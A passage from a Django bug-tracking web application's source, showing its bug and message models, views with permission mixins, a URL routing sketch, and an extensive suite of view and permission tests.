return self.title
__repr__ = __str__
class Message(models.Model):
"""A message written on the bug board"""
writer = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE, related_name='messages'
)
bug = models.ForeignKey(
Bug, on_delete=models.CASCADE, related_name='messages'
)
creationDate = models.DateTimeField(auto_now_add=True)
content = models.TextField()
def __str__(self):
"""Return the string representation of the message object"""
result = self.writer.get_short_name() + ' - ' + self.content
if len(result) > 32:
result = result[:29] + '...'
return result
__repr__ = __str__
```
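A quick sketch of the status helpers defined above; an unsaved `Bug` instance is enough to exercise them in a configured Django environment (`get_active` would additionally need database access):
```python
bug = Bug(title='Crash on save')
bug.set_status('BEING WORKED')    # validated against POSSIBLE_STATUS
print(bug.status)                 # 'BEING WORKED'
print(bug.status_tuples)          # [('BEING WORKED', 'primary'), ('WAITING', 'warning'), ...]

try:
    bug.set_status('NOT A STATUS')
except ValueError as err:
    print(err)                    # lists the allowed status values
```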
#### File: bugs/tests/test_views.py
```python
import datetime
from django.test import TestCase, Client
from django.urls import reverse
from core import utils
from bugs.models import Bug, Message
class TestBugViewsPermissions(TestCase):
"""Test the bug views permission"""
def setUp(self):
self.client = Client()
self.member = utils.sample_member()
self.creator = utils.sample_member(email="<EMAIL>")
self.superuser = utils.sample_superuser()
self.project = utils.sample_project()
self.project.members.add(self.creator)
self.bug = utils.sample_bug(creator=self.creator, project=self.project)
self.list_url = reverse('bugs:list')
self.detail_url = reverse('bugs:detail', args=[self.bug.id])
self.create_url = reverse('bugs:create')
self.update_url = reverse('bugs:update', args=[self.bug.id])
self.creator_update_url = reverse(
'bugs:creator_update', args=[self.bug.id]
)
self.assign_member_url = reverse(
'bugs:assign_member', args=[self.bug.id]
)
self.change_status_url = reverse(
'bugs:change_status', args=[self.bug.id]
)
self.change_working_status_url = reverse(
'bugs:change_working_status', args=[self.bug.id]
)
self.bugPayload = {'title': 'Tmp', 'project': self.project.id}
def test_unauthenticaded_requests(self):
"""Test the bug views for unauthenticated requests"""
for url in [
self.list_url,
self.detail_url,
self.create_url,
self.update_url,
self.creator_update_url,
]:
res = self.client.get(url)
redirect_url = res.url.split('?')[0]
self.assertEqual(res.status_code, 302)
self.assertEqual(redirect_url, reverse('members:login'))
for url in [
self.create_url,
self.update_url,
self.creator_update_url,
self.assign_member_url,
self.change_status_url,
self.change_working_status_url,
]:
res = self.client.post(url)
redirect_url = res.url.split('?')[0]
self.assertEqual(res.status_code, 302)
self.assertEqual(redirect_url, reverse('members:login'))
def test_superuser_requests(self):
"""Test the bug views for superuser requests"""
self.client.force_login(self.superuser)
for url in [
self.list_url,
self.detail_url,
self.create_url,
self.update_url,
self.creator_update_url,
]:
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
for url in [
self.create_url,
self.update_url,
self.creator_update_url,
self.assign_member_url,
self.change_status_url,
self.change_working_status_url,
]:
res = self.client.post(url)
self.assertNotIn(res.status_code, [404, 403, 302])
def test_project_supervisor_requests(self):
"""Test the bug views for project supervisors requests"""
self.project.members.add(self.member)
self.project.supervisors.add(self.member)
self.client.force_login(self.member)
for url in [
self.list_url,
self.detail_url,
self.create_url,
self.update_url,
]:
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
for url in [
self.create_url,
self.update_url,
self.assign_member_url,
self.change_status_url,
self.change_working_status_url,
]:
res = self.client.post(url)
self.assertNotIn(res.status_code, [404, 403, 302])
def test_project_member_requests(self):
"""Test the bug views for project members requests"""
self.project.members.add(self.member)
self.client.force_login(self.member)
res = self.client.get(self.list_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.create_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.get(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.create_url)
self.assertNotIn(res.status_code, [404, 403, 302])
res = self.client.post(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.assign_member_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_working_status_url)
self.assertEqual(res.status_code, 403)
def test_non_project_member_requests(self):
"""Test the bug views for project members requests"""
self.client.force_login(self.member)
res = self.client.get(self.list_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 403)
res = self.client.get(self.create_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.get(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.create_url, self.bugPayload)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.assign_member_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_working_status_url)
self.assertEqual(res.status_code, 403)
def test_assigned_member_requests(self):
"""Test the bug views for requests from members assigned to the bug"""
res = self.client.post(self.change_working_status_url, {'starting': 1})
self.assertEqual(res.status_code, 302)
class TestBugListView(TestCase):
"""Test the bug list view"""
def setUp(self):
self.list_url = reverse('bugs:list')
self.member = utils.sample_member()
self.project = utils.sample_project(creator=self.member)
self.client = Client()
self.client.force_login(self.member)
def test_bug_list_GET_only(self):
"""Test only GET requests are allowed for list view"""
res = self.client.post(self.list_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.list_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.list_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.list_url)
self.assertEqual(res.status_code, 405)
def test_bug_list_empty_list(self):
"""Test the bug list view when the bug list is empty"""
res = self.client.get(self.list_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/list.html')
self.assertFalse(res.context['bugs'].exists())
self.assertContains(res, 'No bugs found')
def test_bug_list_basic(self):
"""Test the bug list for a basic request"""
b1 = utils.sample_bug(
creator=self.member, project=self.project, title="Bug c"
)
b2 = utils.sample_bug(
creator=self.member, project=self.project, title="Bug a"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug d",
_status="FIXED"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug b",
_status="CLOSED"
)
res = self.client.get(self.list_url)
queryset = Bug.objects.filter(id__in=[b1.id, b2.id])
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/list.html')
self.assertQuerysetEqual(
res.context['bugs'],
[repr(bug) for bug in queryset.order_by('-creationDate')]
)
def test_bug_list_show_inactive(self):
"""Test the bug list for a request showing inactive bugs"""
utils.sample_bug(
creator=self.member, project=self.project, title="Bug c"
)
utils.sample_bug(
creator=self.member, project=self.project, title="Bug a"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug d",
_status="FIXED"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug b",
_status="CLOSED"
)
queryset = Bug.objects.all().order_by('-creationDate')
res = self.client.get(self.list_url + '?show_inactive=1')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/list.html')
self.assertQuerysetEqual(
res.context['bugs'],
[repr(bug) for bug in queryset],
)
class TestBugDetailView(TestCase):
"""Test the bug detail view"""
def setUp(self):
self.superuser = utils.sample_superuser(email='<EMAIL>')
self.supervisor = utils.sample_member(email='<EMAIL>')
self.creator = utils.sample_member(email='<EMAIL>')
self.assigned = utils.sample_member(email='<EMAIL>')
self.member = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project(creator=self.supervisor)
self.project.members.add(self.supervisor)
self.project.members.add(self.creator)
self.project.members.add(self.assigned)
self.project.members.add(self.member)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(creator=self.creator, project=self.project)
self.bug.assigned_members.add(self.assigned)
self.client = Client()
self.detail_url = reverse('bugs:detail', args=[self.bug.id])
def test_bug_detail_only_GET(self):
"""Test only GET requests are allowed for the bug detail view"""
self.client.force_login(self.supervisor)
res = self.client.post(self.detail_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.detail_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.detail_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.detail_url)
self.assertEqual(res.status_code, 405)
def test_bug_detail_404_on_nonexisting_bug(self):
"""Test trying to access a non existing bug returns a 404"""
self.client.force_login(self.supervisor)
nonexisting_url = reverse('bugs:detail', args=[9876])
res = self.client.get(nonexisting_url)
self.assertEqual(res.status_code, 404)
def test_bug_detail_successful_request(self):
"""Test a succesful request returns all necessary components"""
self.client.force_login(self.supervisor)
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/detail.html')
self.assertEqual(res.context['bug'], self.bug)
self.assertContains(res, self.bug.title)
self.assertContains(res, self.bug.description)
self.assertContains(res, str.title(self.bug.status))
def test_bug_detail_work_on_bug_button_for_assigned_only(self):
"""Test the 'Work on bug' button only appears for assigned members"""
self.bug.set_status(self.bug.WAITING_STATUS)
self.client.force_login(self.assigned)
res = self.client.get(self.detail_url)
self.assertContains(res, 'Work on bug')
self.client.force_login(self.member)
res = self.client.get(self.detail_url)
self.assertNotContains(res, 'Work on bug')
def test_bug_detail_assign_member_button_for_supervisors_only(self):
"""Test the 'Assign member' button only appears for supervisors"""
self.client.force_login(self.superuser)
res = self.client.get(self.detail_url)
self.assertContains(res, 'Assign a member')
self.client.force_login(self.supervisor)
res = self.client.get(self.detail_url)
self.assertContains(res, 'Assign a member')
self.client.force_login(self.assigned)
res = self.client.get(self.detail_url)
self.assertNotContains(res, 'Assign a member')
self.client.force_login(self.member)
res = self.client.get(self.detail_url)
self.assertNotContains(res, 'Assign a member')
def test_bug_detail_messages(self):
"""Test the bug messages are correctly passed to context"""
self.client.force_login(self.member)
other_bug = utils.sample_bug(
creator=self.supervisor, project=self.project
)
Message.objects.create(
content="Mess 5", bug=self.bug, writer=self.member
)
Message.objects.create(
content="Mess 2", bug=self.bug, writer=self.member
)
Message.objects.create(
content="Mess 1", bug=self.bug, writer=self.superuser
)
Message.objects.create(
content="Mess 4", bug=self.bug, writer=self.supervisor
)
Message.objects.create(
content="Mess 14", bug=other_bug, writer=self.member
)
Message.objects.create(
content="Mess 13", bug=other_bug, writer=self.member
)
messages = Message.objects\
.filter(bug=self.bug).order_by('-creationDate')
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['messages']), list(messages))
class TestBugCreateView(TestCase):
"""Test the bug create view"""
def setUp(self):
self.member = utils.sample_member()
self.project = utils.sample_project(creator=self.member)
self.project.members.add(self.member)
self.client = Client()
self.client.force_login(self.member)
self.create_url = reverse('bugs:create')
def test_bug_create_view_GET_POST_PUT_only(self):
"""Test only GET, POST and PUT requests are allowed to create view"""
res = self.client.patch(self.create_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.create_url)
self.assertEqual(res.status_code, 405)
def test_bug_create_view_GET_basic_successful(self):
"""Test GETting create view with no optinal parameters"""
res = self.client.get(self.create_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/create.html')
self.assertContains(res, 'Title')
self.assertContains(res, 'Description')
self.assertContains(res, 'Project')
def test_bug_create_view_GET_default_project_successful(self):
"""Test GETting create view with optinal parameters"""
res = self.client.get(self.create_url + f'?project={self.project.id}')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/create.html')
self.assertContains(res, 'Title')
self.assertContains(res, 'Description')
self.assertContains(res, 'Project')
def test_bug_create_view_POST_successful(self):
"""Test a bug is created when a valid request is made to create view"""
res = self.client.post(self.create_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
'project': self.project.id
})
self.assertEqual(res.status_code, 302)
self.assertTrue(Bug.objects.filter(title='Bug Title 123').exists())
def test_bug_create_view_sets_creator_and_date_automatically(self):
"""Test the bug creator and creation date are set automatically"""
res = self.client.post(self.create_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
'project': self.project.id
})
self.assertEqual(res.status_code, 302)
bug = Bug.objects.get(title='Bug Title 123')
self.assertEqual(bug.creator, self.member)
self.assertEqual(bug.creationDate.date(), datetime.date.today())
def test_bug_create_view_missing_field(self):
"""Test a missing required field returns an error"""
res = self.client.post(self.create_url, {
'description': 'A bug description',
'project': self.project.id
})
self.assertEqual(res.status_code, 200)
self.assertFalse(
Bug.objects.filter(description='A bug description').exists()
)
res = self.client.post(self.create_url, {
'title': 'Bug Title 456',
'description': 'A bug description',
})
self.assertEqual(res.status_code, 200)
self.assertFalse(
Bug.objects.filter(title='Bug Title 456').exists()
)
def test_bug_create_view_invalid_project(self):
"""Test an invalid project returns an error"""
res = self.client.post(self.create_url, {
'title': 'Bug Title 456',
'description': 'A bug description',
'project': 123
})
self.assertEqual(res.status_code, 200)
self.assertFalse(
Bug.objects.filter(title='Bug Title 456').exists()
)
class TestBugUpdateView(TestCase):
"""Test the bug update view"""
def setUp(self):
self.member = utils.sample_member()
self.project = utils.sample_project(creator=self.member)
self.project.members.add(self.member)
self.project.supervisors.add(self.member)
self.bug = utils.sample_bug(creator=self.member, project=self.project)
self.client = Client()
self.client.force_login(self.member)
self.update_url = reverse('bugs:update', args=[self.bug.id])
def test_bug_update_view_no_DELETE(self):
"""Test DELETE requests are not allowed to update view"""
res = self.client.delete(self.update_url)
self.assertEqual(res.status_code, 405)
def test_bug_update_view_GET(self):
"""Test GETting update view with no optinal parameters"""
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/update.html')
self.assertContains(res, 'Title')
self.assertContains(res, self.bug.title)
self.assertContains(res, 'Description')
self.assertContains(res, self.bug.description)
def test_bug_update_view_POST_successful(self):
"""Test a bug is updated when a valid request is made to update view"""
res = self.client.post(self.update_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.title, 'Bug Title 123')
self.assertEqual(self.bug.description, 'A bug description')
class TestBugCreatorUpdateView(TestCase):
"""Test the bug creator_update view"""
def setUp(self):
self.creator = utils.sample_member()
self.project = utils.sample_project()
self.project.members.add(self.creator)
self.bug = utils.sample_bug(creator=self.creator, project=self.project)
self.client = Client()
self.client.force_login(self.creator)
self.update_url = reverse('bugs:creator_update', args=[self.bug.id])
def test_bug_creator_update_view_creator_allowed(self):
"""Test the bug creator can access the creator_update view"""
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 200)
res = self.client.post(self.update_url)
self.assertNotEqual(res.status_code, 403)
def test_bug_creator_update_view_no_DELETE(self):
"""Test DELETE requests are not allowed to update view"""
res = self.client.delete(self.update_url)
self.assertEqual(res.status_code, 405)
def test_bug_creator_update_view_GET(self):
"""Test GETting update view with no optinal parameters"""
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/creator_update.html')
self.assertContains(res, 'Title')
self.assertContains(res, self.bug.title)
self.assertContains(res, 'Description')
self.assertContains(res, self.bug.description)
def test_bug_creator_update_view_POST_successful(self):
"""Test a bug is updated when a valid request is made to update view"""
res = self.client.post(self.update_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.title, 'Bug Title 123')
self.assertEqual(self.bug.description, 'A bug description')
class TestBugAssignMemberView(TestCase):
"""Test the bug AssignMember view"""
def setUp(self):
self.member = utils.sample_member(email='<EMAIL>')
self.supervisor = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project()
self.project.members.add(self.member)
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(creator=self.member, project=self.project)
self.client = Client()
self.client.force_login(self.supervisor)
self.assign_member_url = reverse(
'bugs:assign_member', args=[self.bug.id]
)
def test_bug_assign_member_view_POST_only(self):
"""Test the bug 'assign_member' view only accepts POST requests"""
res = self.client.get(self.assign_member_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.assign_member_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.assign_member_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.assign_member_url)
self.assertEqual(res.status_code, 405)
    def test_bug_assign_member_view_successful(self):
        """Test the bug 'assign_member' view successfully assigns members"""
m1 = utils.sample_member(email='<EMAIL>')
m2 = utils.sample_member(email='<EMAIL>')
self.project.members.add(m1)
self.project.members.add(m2)
res1 = self.client.post(
self.assign_member_url, {'member_ids': [str(self.member.id)]}
)
res2 = self.client.post(
self.assign_member_url, {'member_ids': [m1.id, m2.id]}
)
self.assertEqual(res1.status_code, 302)
self.assertEqual(res2.status_code, 302)
self.assertIn(self.member, self.bug.assigned_members.all())
self.assertIn(m1, self.bug.assigned_members.all())
self.assertIn(m2, self.bug.assigned_members.all())
def test_bug_assign_member_view_errors(self):
"""Test the bug 'assign_member' view raises errors when needed"""
non_project_member = utils.sample_member(email='<EMAIL>')
res = self.client.post(self.assign_member_url)
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
res = self.client.post(self.assign_member_url, {'member_ids': 1})
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
res = self.client.post(self.assign_member_url, {'member_ids': [2165]})
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
res = self.client.post(
self.assign_member_url, {'member_ids': non_project_member.id}
)
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
class TestBugChangeStatusView(TestCase):
"""Test the bug ChangeStatus view"""
def setUp(self):
self.supervisor = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project()
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(
creator=self.supervisor, project=self.project
)
self.bug.set_status(self.bug.WAITING_STATUS)
self.client = Client()
self.client.force_login(self.supervisor)
self.change_status_url = reverse(
'bugs:change_status', args=[self.bug.id]
)
def test_bug_change_status_view_POST_only(self):
"""Test the bug 'change_status' view accepts only POST requests"""
res = self.client.get(self.change_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.change_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.change_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.change_status_url)
self.assertEqual(res.status_code, 405)
def test_bug_change_status_view_successful(self):
"""Test the bug 'change_status' view succesfully changes bug status"""
res = self.client.post(self.change_status_url, {'status': 'FIXED'})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.status, 'FIXED')
self.assertEqual(self.bug.closingDate.date(), datetime.date.today())
def test_bug_change_status_view_error(self):
"""Test the bug 'change_status' view raises errors when needed"""
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(
self.change_status_url, {'status': 'nonexistent_status'}
)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
class TestBugChangeWorkingStatusView(TestCase):
"""Test the bug ChangeWorkingStatus view"""
def setUp(self):
self.supervisor = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project()
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(
creator=self.supervisor, project=self.project
)
self.bug.set_status(self.bug.WAITING_STATUS)
self.client = Client()
self.client.force_login(self.supervisor)
self.change_working_status_url = reverse(
'bugs:change_working_status', args=[self.bug.id]
)
def test_bug_change_working_status_view_POST_only(self):
"""Test bug 'change_working_status' view accepts only POST requests"""
res = self.client.get(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
def test_bug_change_working_status_view_successful(self):
"""Test bug 'change_working_status' view succesfully changes status"""
res = self.client.post(self.change_working_status_url, {'starting': 1})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.status, self.bug.WORKING_STATUS)
res = self.client.post(self.change_working_status_url, {'starting': 0})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
def test_bug_change_working_status_view_error(self):
"""Test bug 'change_working_status' view raises errors when needed"""
res = self.client.post(self.change_working_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(
self.change_working_status_url, {'starting': 'wrong'}
)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
class TestMessageViews(TestCase):
"""Test the views involving bug messages"""
def setUp(self):
self.superuser = utils.sample_superuser()
self.supervisor = utils.sample_member(email="<EMAIL>")
self.member = utils.sample_member()
self.non_member = utils.sample_member(email="<EMAIL>")
self.project = utils.sample_project(creator=self.supervisor)
self.project.members.add(self.member)
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(
creator=self.superuser, project=self.project
)
self.client = Client()
self.message_create_url = reverse(
'bugs:create_message', args=[self.bug.id]
)
def test_message_create_view_only_POST_allowed(self):
"""Test the message create view only accepts POST requests"""
self.client.force_login(self.superuser)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 405)
for method in ['get', 'put', 'patch', 'delete']:
res = getattr(self.client, method)(self.message_create_url)
self.assertEqual(res.status_code, 405)
def test_message_create_view_permissions(self):
"""Test the permission for the create_message view are correct"""
res = self.client.post(self.message_create_url)
self.assertRedirects(
res,
reverse('members:login') +
f'?next=/bugs/{self.bug.id}/create_message'
)
self.client.force_login(self.non_member)
res = self.client.post(self.message_create_url)
self.assertEqual(res.status_code, 403)
self.client.force_login(self.member)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 403)
self.client.force_login(self.supervisor)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 403)
self.client.force_login(self.superuser)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 403)
def test_message_create_view_successful(self):
"""Test the message create view automatically sets fields correctly"""
payload = {'content': 'Test Message'}
self.client.force_login(self.member)
res = self.client.post(self.message_create_url, payload)
message = Message.objects.filter(content=payload['content'])
self.assertEqual(res.status_code, 302)
self.assertTrue(message.exists())
self.assertEqual(message[0].bug, self.bug)
self.assertEqual(message[0].writer, self.member)
self.assertEqual(message[0].creationDate.date(), datetime.date.today())
def test_message_create_view_invalid_payload(self):
"""Test the message create view correctly handles invalid payloads"""
self.client.force_login(self.member)
res = self.client.post(self.message_create_url)
self.assertEqual(res.status_code, 400)
self.assertFalse(Message.objects.exists())
res = self.client.post(self.message_create_url, {'content': ''})
self.assertEqual(res.status_code, 400)
self.assertFalse(Message.objects.exists())
```
#### File: app/bugs/views.py
```python
from django.urls import reverse_lazy
from django.shortcuts import redirect, get_object_or_404
from django.core.exceptions import SuspiciousOperation
from django.core.exceptions import PermissionDenied
from django.utils import timezone
from django.views.generic import View
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.views.generic.edit import CreateView, UpdateView
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import Bug, Message
from .forms import BugCreateForm, BugUpdateForm, BugCreatorUpdateForm
from core.mixins import \
IsInProjectMixin, \
IsSupervisorMixin, \
IsSupervisorOrAssignedMixin, \
IsCreatorMixin
from members.models import Member
class BugListView(LoginRequiredMixin, ListView):
"""View for listing bugs"""
model = Bug
template_name = 'bugs/list.html'
context_object_name = 'bugs'
login_url = reverse_lazy('members:login')
def get_queryset(self):
"""Return the list of projects applting filters and ordering"""
queryset = self.model.objects.all() \
if self.request.GET.get('show_inactive') \
else self.model.get_active().all()
return queryset.order_by('-creationDate')
class BugDetailView(IsInProjectMixin, DetailView):
"""View for display bug detail"""
model = Bug
template_name = 'bugs/detail.html'
context_object_name = 'bug'
def get_context_data(self, **kwargs):
"""Add additional data to the context"""
context = super().get_context_data(**kwargs)
context['isAdminOrSupervisor'] = (
self.request.user.is_superuser or
self.request.user in self.object.project.supervisors.all()
)
context['status_class'] = 'text-' + self.object.STATUS_CLASSES[
self.object.status
]
context['messages'] = self.object.messages.order_by('-creationDate')
return context
class BugCreateView(LoginRequiredMixin, CreateView):
"""View for creating bugs"""
model = Bug
form_class = BugCreateForm
template_name = 'bugs/create.html'
login_url = reverse_lazy('members:login')
def get_success_url(self):
"""Return the url to the current object detail page"""
return reverse_lazy('bugs:detail', args=[self.object.id])
def form_valid(self, form):
"""If the form is valid, add the creator and save the object"""
if not self.request.user.is_authenticated:
print("Bug creation of unauthenticated user denied!")
return redirect(self.login_url)
self.object = form.save(commit=False)
if not self.request.user.is_superuser and \
self.request.user not in self.object.project.members.all():
raise PermissionDenied(
"A member cannot create a bug on a project it is not part of!"
)
self.object.creator = self.request.user
self.object.save()
form.save_m2m()
return redirect(self.get_success_url())
def get_initial(self):
"""Set the active project if supplied in GET param"""
project = self.request.GET.get('project')
if project:
return {'project': int(project)}
return {}
class BugUpdateView(IsSupervisorMixin, UpdateView):
"""View for updating bugs"""
model = Bug
form_class = BugUpdateForm
template_name = 'bugs/update.html'
login_url = reverse_lazy('members:login')
def get_success_url(self):
"""Return the url to the current object detail page"""
return reverse_lazy('bugs:detail', args=[self.object.id])
def get_form(self, form_class=None):
"""Return a form with the correct queryset"""
if form_class is None:
form_class = self.get_form_class()
if self.object and self.object.project:
project_members = self.object.project.members.all()
return form_class(project_members, **self.get_form_kwargs())
return form_class(None, **self.get_form_kwargs())
class BugCreatorUpdateView(IsCreatorMixin, UpdateView):
"""View for updating bugs"""
model = Bug
form_class = BugCreatorUpdateForm
template_name = 'bugs/creator_update.html'
login_url = reverse_lazy('members:login')
def get_success_url(self):
"""Return the url to the current object detail page"""
return reverse_lazy('bugs:detail', args=[self.object.id])
class BugAssignMemberView(IsSupervisorMixin, View):
"""Perform assignment of member to bug"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
member_ids = request.POST.getlist('member_ids')
if not member_ids:
raise SuspiciousOperation('Member id not sent!')
member_ids = [int(m_id) for m_id in member_ids]
try:
for member_id in member_ids:
member = Member.objects.get(id=member_id)
if member not in bug.project.members.all():
raise SuspiciousOperation(
'Member must be part of bug project!'
)
bug.assigned_members.add(member)
except Member.DoesNotExist:
raise SuspiciousOperation('Invalid member id!')
return redirect('bugs:detail', pk=pk)
class BugChangeStatusView(IsSupervisorMixin, View):
"""Change the status of the bug"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
status = request.POST.get('status')
if not status:
raise SuspiciousOperation('New status must be sent in POST')
try:
bug.set_status(status)
except ValueError:
raise SuspiciousOperation('Invalid status')
else:
if status not in bug.ACTIVE_STATUS:
bug.closingDate = timezone.now()
bug.save()
return redirect('bugs:detail', pk=pk)
class BugChangeWorkingStatusView(IsSupervisorOrAssignedMixin, View):
"""Change the status of the bug"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
starting = request.POST.get('starting')
if starting is None:
raise SuspiciousOperation(
'Value of starting must be sent in POST'
)
try:
bug.set_status(
bug.WORKING_STATUS if int(starting) else bug.WAITING_STATUS
)
bug.save()
except ValueError:
raise SuspiciousOperation('Invalid status')
return redirect('bugs:detail', pk=pk)
class MessageCreateView(IsInProjectMixin, View):
"""Creates a new message for the bug board"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
content = request.POST.get('content', None)
if not content:
raise SuspiciousOperation('Invalid message text!')
content = str(content)
Message.objects.create(
content=content,
writer=request.user,
bug=bug
)
return redirect('bugs:detail', pk=pk)
```
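The test suite above resolves these views through names like `bugs:list` and `bugs:detail`; a plausible `urls.py` wiring is sketched below. Only the route names come from the tests; the path strings (and the `/bugs/<id>/create_message` shape implied by one redirect assertion) are otherwise assumptions:
```python
from django.urls import path

from . import views

app_name = 'bugs'

urlpatterns = [
    path('', views.BugListView.as_view(), name='list'),
    path('create', views.BugCreateView.as_view(), name='create'),
    path('<int:pk>/', views.BugDetailView.as_view(), name='detail'),
    path('<int:pk>/update', views.BugUpdateView.as_view(), name='update'),
    path('<int:pk>/creator_update', views.BugCreatorUpdateView.as_view(), name='creator_update'),
    path('<int:pk>/assign_member', views.BugAssignMemberView.as_view(), name='assign_member'),
    path('<int:pk>/change_status', views.BugChangeStatusView.as_view(), name='change_status'),
    path('<int:pk>/change_working_status', views.BugChangeWorkingStatusView.as_view(), name='change_working_status'),
    path('<int:pk>/create_message', views.MessageCreateView.as_view(), name='create_message'),
]
```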
#### File: projects/tests/test_models.py
```python
from django.test import TestCase
from mixer.backend.django import mixer
from projects.models import Project
from bugs.models import Bug
class ProjectModelTests(TestCase):
"""Test the project model"""
def setUp(self):
self.project = Project.objects.create(title='Test')
def test_project_status_enums(self):
"""Test the status enums are set up correctly"""
for active_status in Project.ACTIVE_STATUS:
self.assertIn(active_status, Project.POSSIBLE_STATUS)
for status in Project.POSSIBLE_STATUS:
self.assertIn(status, Project.STATUS_CLASSES.keys())
